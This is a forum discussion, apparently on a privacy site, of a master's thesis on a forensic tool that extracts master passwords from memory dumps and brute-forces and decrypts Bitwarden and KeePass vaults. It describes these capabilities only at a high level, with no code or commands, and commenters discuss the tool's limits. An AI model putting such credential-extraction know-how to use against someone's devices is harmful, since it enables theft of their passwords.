The present work addresses this gap and presents a process to extract forensically relevant data from two password manager applications – Bitwarden and KeePass – by extending an existing forensic framework called Vision.
Using design science, a forensic extraction process was developed by thoroughly analysing the inner workings of the mentioned password managers. The artefact was named Password Manager Forensics (PMF) and consists of a four-step extraction process with different Python modules to automate the extraction of relevant data. PMF was tested against three scenarios in a laboratory setting to evaluate its applicability in an investigative context.
The results show that the artefact is able to extract forensically relevant information related to password managers that would otherwise not be readily available to investigators. PMF is capable to identify and extract relevant files, to extract master passwords from a memory dump, to parse configuration files for relevant data, to brute-force master passwords and PIN codes, to decrypt, extract, and validate password manager vault data, and to create summary reports.
PMF is the first comprehensive forensic process to extract relevant data from password managers. This brings new opportunities for digital forensics examiners and a potential to improve the handling of devices that contain password manager data in digital investigations.
The current version of PMF only supports Windows desktop applications of Bitwarden and KeePass
I don’t have deep technical knowledge to judge the source, but the first thing I see in the page is that it’s a master thesis. I have masters in a non-computer science field, bur generally it’s hard to find revealing things in a master’s thesis.
Looking at the scenarios, in all cases, your device needs to be seized. Personally, there would be other things than Bitwarden if my device is taken from me.
The author did a good thesis here. This article is essentially just a reference on what information you’re likely to get from password managers from a physical extraction of a suspect’s PC. It’s nothing that people don’t already know, but it’s a good read nonetheless.
KeePass typically encrypts memory and erases memory, but as seen in the thesis that didn’t appear to work. It may be due to how he performed the memory extraction as he used a VirtualBox VM physical memory dump rather than a Windows OS memory dump artefact, would have liked to see him examined those types of dumps.
Should be worth noting that judging by the literature review and that the latest article he captured was around March of this year, he likely worked on this investigation within that timeframe. That tool is likely to not work anymore now due to some changes in how KeePass manages passwords in memory. KeePass now creates dummy material in memory the same length as the original key.
In May, another researcher disclosed a security vulnerability relating to capturing the KeePass master password in memory.
I memory dumped my latest KeePass with the PMF script and my password was apparently ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/.
Likewise mitigations like these are more to protect KeePass databases from malware, not forensics, if your PC is undergoing a forensics extraction you’d probably have a hundred more things to worry about before your password database.
Strongly agree. In pretty much all masters digital forensics papers they are done in a consent-based extraction / scenario where a compromise like bruteforcing was successful, since “we were unable to perform extraction” wouldn’t be a good thesis to read.
Massive organizations are monitoring your online activities. Privacy Guides is your central privacy and security resource to protect yourself online.